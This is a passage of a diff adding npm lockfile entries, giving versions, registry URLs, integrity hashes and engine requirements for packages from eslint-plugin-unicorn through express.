"sha512-xCt/TOAc+EOHS1XPnijD3/yzpH6qg2xppZO1YDqGoVsNXfQfzHpOdNuXwrwOU8u4ITXJyDCTyt8w5g1sZv9ynQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18.12" + }, + "peerDependencies": { + "typescript": ">=4.8.4" + } + }, + "node_modules/eslint-plugin-unicorn": { + "version": "56.0.0", + "resolved": "https://registry.npmjs.org/eslint-plugin-unicorn/-/eslint-plugin-unicorn-56.0.0.tgz", + "integrity": "sha512-aXpddVz/PQMmd69uxO98PA4iidiVNvA0xOtbpUoz1WhBd4RxOQQYqN618v68drY0hmy5uU2jy1bheKEVWBjlPw==", + "dev": true, + "dependencies": { + "@babel/helper-validator-identifier": "^7.24.7", + "@eslint-community/eslint-utils": "^4.4.0", + "ci-info": "^4.0.0", + "clean-regexp": "^1.0.0", + "core-js-compat": "^3.38.1", + "esquery": "^1.6.0", + "globals": "^15.9.0", + "indent-string": "^4.0.0", + "is-builtin-module": "^3.2.1", + "jsesc": "^3.0.2", + "pluralize": "^8.0.0", + "read-pkg-up": "^7.0.1", + "regexp-tree": "^0.1.27", + "regjsparser": "^0.10.0", + "semver": "^7.6.3", + "strip-indent": "^3.0.0" + }, + "engines": { + "node": ">=18.18" + }, + "funding": { + "url": "https://github.com/sindresorhus/eslint-plugin-unicorn?sponsor=1" + }, + "peerDependencies": { + "eslint": ">=8.56.0" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/ci-info": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-4.0.0.tgz", + "integrity": "sha512-TdHqgGf9odd8SXNuxtUBVx8Nv+qZOejE6qyqiy5NtbYYQOeFa6zmHkxlPzmaLxWWHsU6nJmB7AETdVPi+2NBUg==", + "dev": true, + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "engines": { + "node": ">=8" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/globals": { + "version": "15.11.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-15.11.0.tgz", + "integrity": "sha512-yeyNSjdbyVaWurlwCpcA6XNBrHTMIeDdj0/hnvX/OLJ9ekOXYbLsLinH/MucQyGvNnXhidTdNhTtJaffL2sMfw==", + "dev": true, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/regjsparser": { + "version": "0.10.0", + "resolved": "https://registry.npmjs.org/regjsparser/-/regjsparser-0.10.0.tgz", + "integrity": "sha512-qx+xQGZVsy55CH0a1hiVwHmqjLryfh7wQyF5HO07XJ9f7dQMY/gPQHhlyDkIzJKC+x2fUCpCcUODUUUFrm7SHA==", + "dev": true, + "dependencies": { + "jsesc": "~0.5.0" + }, + "bin": { + "regjsparser": "bin/parser" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/regjsparser/node_modules/jsesc": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-0.5.0.tgz", + "integrity": "sha512-uZz5UnB7u4T9LvwmFqXii7pZSouaRPorGs5who1Ip7VO0wxanFvBL7GkM6dTHlgX+jhBApRetaWpnDabOeTcnA==", + "dev": true, + "bin": { + "jsesc": "bin/jsesc" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/eslint-plugin-unicorn/node_modules/strip-indent": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/strip-indent/-/strip-indent-3.0.0.tgz", + "integrity": "sha512-laJTa3Jb+VQpaC6DseHhF7dXVqHTfJPCRDaEbid/drOhgitgYku/letMUqOXFoWV0zIIUbjpdH2t+tYj4bQMRQ==", + "dev": true, + "dependencies": { + "min-indent": "^1.0.0" + }, + "engines": { + "node": ">=8" + } + }, + 
"node_modules/eslint-scope": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-5.1.1.tgz", + "integrity": "sha512-2NxwbF/hZ0KpepYN0cNbo+FN6XoK7GaHlQhgx/hIZl6Va0bF45RQOOwhLIy8lQDbuCiadSLCBnH2CFYquit5bw==", + "dev": true, + "dependencies": { + "esrecurse": "^4.3.0", + "estraverse": "^4.1.1" + }, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/eslint-scope/node_modules/estraverse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-4.3.0.tgz", + "integrity": "sha512-39nnKffWz8xN1BU/2c79n9nB9HDzo0niYUqx6xyqUnyoAnQyyWpOTdZEeiCch8BBu515t4wp9ZmgVfVhn9EBpw==", + "dev": true, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/eslint-utils": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-2.1.0.tgz", + "integrity": "sha512-w94dQYoauyvlDc43XnGB8lU3Zt713vNChgt4EWwhXAP2XkBvndfxF0AgIqKOOasjPIPzj9JqgwkwbCYD0/V3Zg==", + "dev": true, + "dependencies": { + "eslint-visitor-keys": "^1.1.0" + }, + "engines": { + "node": ">=6" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + } + }, + "node_modules/eslint-utils/node_modules/eslint-visitor-keys": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", + "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/eslint-visitor-keys": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-2.1.0.tgz", + "integrity": "sha512-0rSmRBzXgDzIsD6mGdJgevzgezI534Cer5L/vyMX0kHzT/jiB43jRhd9YUlMGYLQy2zprNmoT8qasCGtY+QaKw==", + "dev": true, + "engines": { + "node": ">=10" + } + }, + "node_modules/eslint/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/eslint/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/eslint/node_modules/eslint-scope": { + "version": "7.2.2", + "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-7.2.2.tgz", + "integrity": "sha512-dOt21O7lTMhDM+X9mB4GX+DZrZtCUJPL/wlcTqxyrx5IvO0IYtILdtrQGQp+8n5S0gwSVmOf9NQrjMOgfQZlIg==", + "dependencies": { + "esrecurse": "^4.3.0", + "estraverse": "^5.2.0" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + 
"funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/eslint/node_modules/glob-parent": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dependencies": { + "is-glob": "^4.0.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/eslint/node_modules/globals": { + "version": "13.23.0", + "resolved": "https://registry.npmjs.org/globals/-/globals-13.23.0.tgz", + "integrity": "sha512-XAmF0RjlrjY23MA51q3HltdlGxUpXPvg0GioKiD9X6HD28iMjo2dKC8Vqwm7lne4GNr78+RHTfliktR6ZH09wA==", + "dependencies": { + "type-fest": "^0.20.2" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/eslint/node_modules/optionator": { + "version": "0.9.3", + "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.3.tgz", + "integrity": "sha512-JjCoypp+jKn1ttEFExxhetCKeJt9zhAgAve5FXHixTvFDW/5aEktX9bufBKLRRMdU7bNtpLfcGu94B3cdEJgjg==", + "dependencies": { + "@aashutoshrathi/word-wrap": "^1.2.3", + "deep-is": "^0.1.3", + "fast-levenshtein": "^2.0.6", + "levn": "^0.4.1", + "prelude-ls": "^1.2.1", + "type-check": "^0.4.0" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/eslint/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/esm": { + "version": "3.2.25", + "resolved": "https://registry.npmjs.org/esm/-/esm-3.2.25.tgz", + "integrity": "sha512-U1suiZ2oDVWv4zPO56S0NcR5QriEahGtdN2OR6FiOG4WJvcjBVFB0qI4+eKoWFH483PKGuLuu6V8Z4T5g63UVA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/esmock": { + "version": "2.6.3", + "resolved": "https://registry.npmjs.org/esmock/-/esmock-2.6.3.tgz", + "integrity": "sha512-1gtVLLHyB742JNWkIFfiKwB8rXgJZO/X717ua4yzT0hIqsDFjtnrpAKHO+HlIMSIhMExCWJzpk9lDsh2XuKAKw==", + "engines": { + "node": ">=14.16.0" + } + }, + "node_modules/esniff": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/esniff/-/esniff-2.0.1.tgz", + "integrity": "sha512-kTUIGKQ/mDPFoJ0oVfcmyJn4iBDRptjNVIzwIFR7tqWXdVI9xfA2RMwY/gbSpJG3lkdWNEjLap/NqVHZiJsdfg==", + "dependencies": { + "d": "^1.0.1", + "es5-ext": "^0.10.62", + "event-emitter": "^0.3.5", + "type": "^2.7.2" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/espree": { + "version": "9.6.1", + "resolved": "https://registry.npmjs.org/espree/-/espree-9.6.1.tgz", + "integrity": "sha512-oruZaFkjorTpF32kDSI5/75ViwGeZginGGy2NoOSg3Q9bnwlnmDm4HLnkl0RE3n+njDXR037aY1+x58Z/zFdwQ==", + "dependencies": { + "acorn": "^8.9.0", + "acorn-jsx": "^5.3.2", + "eslint-visitor-keys": "^3.4.1" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/espree/node_modules/acorn": { + "version": "8.10.0", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.10.0.tgz", + "integrity": "sha512-F0SAmZ8iUtS//m8DmCTA0jlh6TDKkHQyK6xc6V4KDTyZKA9dnvX9/3sRTVQrWm79glUAZbnmmNcdYwUIHWVybw==", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/espree/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + 
"resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/esprima": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", + "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", + "bin": { + "esparse": "bin/esparse.js", + "esvalidate": "bin/esvalidate.js" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/esprima-next": { + "version": "5.8.1", + "resolved": "https://registry.npmjs.org/esprima-next/-/esprima-next-5.8.1.tgz", + "integrity": "sha512-jPuleZ9j065A9xGKreFh9YSgPlbL9/miG/l4KslkwEb7Ilwl5Ct7BmDkSTHA0rW0qnqLx+hsZWIB66s1XaMAyA==", + "dev": true, + "bin": { + "esparse": "bin/esparse.js", + "esvalidate": "bin/esvalidate.js" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/esquery": { + "version": "1.6.0", + "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.6.0.tgz", + "integrity": "sha512-ca9pw9fomFcKPvFLXhBKUK90ZvGibiGOvRJNbjljY7s7uq/5YO4BOzcYtJqExdx99rF6aAcnRxHmcUHcz6sQsg==", + "dependencies": { + "estraverse": "^5.1.0" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/esrecurse": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", + "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", + "dependencies": { + "estraverse": "^5.2.0" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/estraverse": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.3.0.tgz", + "integrity": "sha512-MMdARuVEQziNTeJD8DgMqmhwR11BRQ/cBP+pLtYdSTnf3MIO8fFeiINEbX36ZdNlfU/7A9f3gUw49B3oQsvwBA==", + "engines": { + "node": ">=4.0" + } + }, + "node_modules/estree-walker": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-3.0.3.tgz", + "integrity": "sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/estree": "^1.0.0" + } + }, + "node_modules/esutils": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", + "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/etag": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/etag/-/etag-1.8.1.tgz", + "integrity": "sha1-Qa4u62XvpiJorr/qg6x9eSmbCIc=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/event-emitter": { + "version": "0.3.5", + "resolved": "https://registry.npmjs.org/event-emitter/-/event-emitter-0.3.5.tgz", + "integrity": "sha1-34xp7vFkeSPHFXuc6DhAYQsCzDk=", + "dependencies": { + "d": "1", + "es5-ext": "~0.10.14" + } + }, + "node_modules/event-target-shim": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/event-target-shim/-/event-target-shim-5.0.1.tgz", + "integrity": "sha512-i/2XbnSz/uxRCU6+NdVJgKWDTM427+MqYbkQzD321DuCQJUqOuJKIA0IM2+W2xtYHdKOmZ4dR6fExsd4SXL+WQ==", + "engines": { + "node": ">=6" + } + }, + "node_modules/eventemitter2": { + "version": "6.4.7", + "resolved": 
"https://registry.npmjs.org/eventemitter2/-/eventemitter2-6.4.7.tgz", + "integrity": "sha512-tYUSVOGeQPKt/eC1ABfhHy5Xd96N3oIijJvN3O9+TsC28T5V9yX9oEfEK5faP0EFSNVOG97qtAS68GBrQB2hDg==", + "dev": true + }, + "node_modules/eventemitter3": { + "version": "4.0.7", + "resolved": "https://registry.npmjs.org/eventemitter3/-/eventemitter3-4.0.7.tgz", + "integrity": "sha512-8guHBZCwKnFhYdHr2ysuRWErTwhoN2X8XELRlrRwpmfeY2jjuUN4taQMsULKUVo1K4DvZl+0pgfyoysHxvmvEw==", + "dev": true, + "license": "MIT" + }, + "node_modules/eventid": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/eventid/-/eventid-2.0.1.tgz", + "integrity": "sha512-sPNTqiMokAvV048P2c9+foqVJzk49o6d4e0D/sq5jog3pw+4kBgyR0gaM1FM7Mx6Kzd9dztesh9oYz1LWWOpzw==", + "dependencies": { + "uuid": "^8.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/eventid/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + "integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/events": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/events/-/events-1.1.1.tgz", + "integrity": "sha1-nr23Y1rQmccNzEwqH1AEKI6L2SQ=", + "engines": { + "node": ">=0.4.x" + } + }, + "node_modules/events-listener": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/events-listener/-/events-listener-1.1.0.tgz", + "integrity": "sha512-Kd3EgYfODHueq6GzVfs/VUolh2EgJsS8hkO3KpnDrxVjU3eq63eXM2ujXkhPP+OkeUOhL8CxdfZbQXzryb5C4g==" + }, + "node_modules/eventsource-parser": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/eventsource-parser/-/eventsource-parser-1.1.2.tgz", + "integrity": "sha512-v0eOBUbiaFojBu2s2NPBfYUoRR9GjcDNvCXVaqEf5vVfpIAh9f8RCo4vXTP8c63QRKCFwoLpMpTdPwwhEKVgzA==", + "engines": { + "node": ">=14.18" + } + }, + "node_modules/executable": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/executable/-/executable-4.1.1.tgz", + "integrity": "sha512-8iA79xD3uAch729dUG8xaaBBFGaEa0wdD2VkYLFHwlqosEj/jT66AzcreRDSgV7ehnNLBW2WR5jIXwGKjVdTLg==", + "dev": true, + "dependencies": { + "pify": "^2.2.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/exegesis": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/exegesis/-/exegesis-4.1.1.tgz", + "integrity": "sha512-PvSqaMOw2absLBgsthtJyVOeCHN4lxQ1dM7ibXb6TfZZJaoXtGELoEAGJRFvdN16+u9kg8oy1okZXRk8VpimWA==", + "dependencies": { + "@apidevtools/json-schema-ref-parser": "^9.0.3", + "ajv": "^8.3.0", + "ajv-formats": "^2.1.0", + "body-parser": "^1.18.3", + "content-type": "^1.0.4", + "deep-freeze": "0.0.1", + "events-listener": "^1.1.0", + "glob": "^7.1.3", + "json-ptr": "^3.0.1", + "json-schema-traverse": "^1.0.0", + "lodash": "^4.17.11", + "openapi3-ts": "^3.1.1", + "promise-breaker": "^6.0.0", + "pump": "^3.0.0", + "qs": "^6.6.0", + "raw-body": "^2.3.3", + "semver": "^7.0.0" + }, + "engines": { + "node": ">=6.0.0", + "npm": ">5.0.0" + } + }, + "node_modules/exegesis-express": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/exegesis-express/-/exegesis-express-4.0.0.tgz", + "integrity": "sha512-V2hqwTtYRj0bj43K4MCtm0caD97YWkqOUHFMRCBW5L1x9IjyqOEc7Xa4oQjjiFbeFOSQzzwPV+BzXsQjSz08fw==", + "dependencies": { + "exegesis": "^4.1.0" + }, + "engines": { + "node": ">=6.0.0", + "npm": ">5.0.0" + } + }, + "node_modules/exegesis/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": 
"sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/exegesis/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==" + }, + "node_modules/exegesis/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/exegesis/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/exegesis/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/expand-brackets": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/expand-brackets/-/expand-brackets-2.1.4.tgz", + "integrity": "sha512-w/ozOKR9Obk3qoWeY/WDi6MFta9AoMR+zud60mdnbniMcBxRuFJyDt2LdX/14A1UABeqk+Uk+LDfUpvoGKppZA==", + "dev": true, + "dependencies": { + "debug": "^2.3.3", + "define-property": "^0.2.5", + "extend-shallow": "^2.0.1", + "posix-character-classes": "^0.1.0", + "regex-not": "^1.0.0", + "snapdragon": "^0.8.1", + "to-regex": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/expand-brackets/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/expand-brackets/node_modules/define-property": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/expand-brackets/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/expand-brackets/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": 
"sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/expand-brackets/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/expand-brackets/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", + "dev": true + }, + "node_modules/expect": { + "version": "1.20.2", + "resolved": "https://registry.npmjs.org/expect/-/expect-1.20.2.tgz", + "integrity": "sha512-vUOB6rNLhhRgchrNzJZH72FXDgiHmmEqX07Nlb1363HyZm/GFzkNMq0X0eIygMtdc4f2okltziddtVM4D5q0Jw==", + "dev": true, + "dependencies": { + "define-properties": "~1.1.2", + "has": "^1.0.1", + "is-equal": "^1.5.1", + "is-regex": "^1.0.3", + "object-inspect": "^1.1.0", + "object-keys": "^1.0.9", + "tmatch": "^2.0.1" + } + }, + "node_modules/expect/node_modules/define-properties": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/define-properties/-/define-properties-1.1.4.tgz", + "integrity": "sha512-uckOqKcfaVvtBdsVkdPv3XjveQJsNQqmhXgRi8uhvWWuPYZCNlzT8qAyblUgNoXdHdjMTzAqeGjAoli8f+bzPA==", + "dev": true, + "dependencies": { + "has-property-descriptors": "^1.0.0", + "object-keys": "^1.1.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/express": { + "version": "4.21.2", + "resolved": "https://registry.npmjs.org/express/-/express-4.21.2.tgz", + "integrity": "sha512-28HqgMZAmih1Czt9ny7qr6ek2qddF4FclbMzwhCREB6OFfH+rXAnuNCwo1/wFvrtbgsQDb4kSbX9de9lFbrXnA==", + "license": "MIT", + "dependencies": { + "accepts": "~1.3.8", + "array-flatten": "1.1.1", + "body-parser": "1.20.3", + "content-disposition": "0.5.4", + "content-type": "~1.0.4", + "cookie": "0.7.1", + "cookie-signature": "1.0.6", + "debug": "2.6.9", + "depd": "2.0.0", + "encodeurl": "~2.0.0", + "escape-html": "~1.0.3", + "etag": "~1.8.1", + "finalhandler": "1.3.1", + "fresh": "0.5.2", + "http-errors": "2.0.0", + "merge-descriptors": "1.0.3", + "methods": "~1.1.2", + "on-finished": "2.4.1", + "parseurl": "~1.3.3", + "path-to-regexp": "0.1.12", + "proxy-addr": "~2.0.7", + "qs": "6.13.0", + "range-parser": "~1.2.1", + "safe-buffer": "5.2.1", + "send": "0.19.0", + "serve-static": "1.16.2", + "setprototypeof": "1.2.0", + "statuses": "2.0.1", + "type-is": "~1.6.18", + "utils-merge": "1.0.1", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.10.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/express" + } + }, + "node_modules/express-basic-auth": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/express-basic-auth/-/express-basic-auth-1.2.1.tgz", + "integrity": "sha512-L6YQ1wQ/mNjVLAmK3AG1RK6VkokA1BIY6wmiH304Xtt/cLTps40EusZsU1Uop+v9lTDPxdtzbFmdXfFO3KEnwA==", + "dependencies": { + "basic-auth": "^2.0.1" + } + }, + "node_modules/express-bearer-token": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/express-bearer-token/-/express-bearer-token-2.4.0.tgz", + "integrity": 
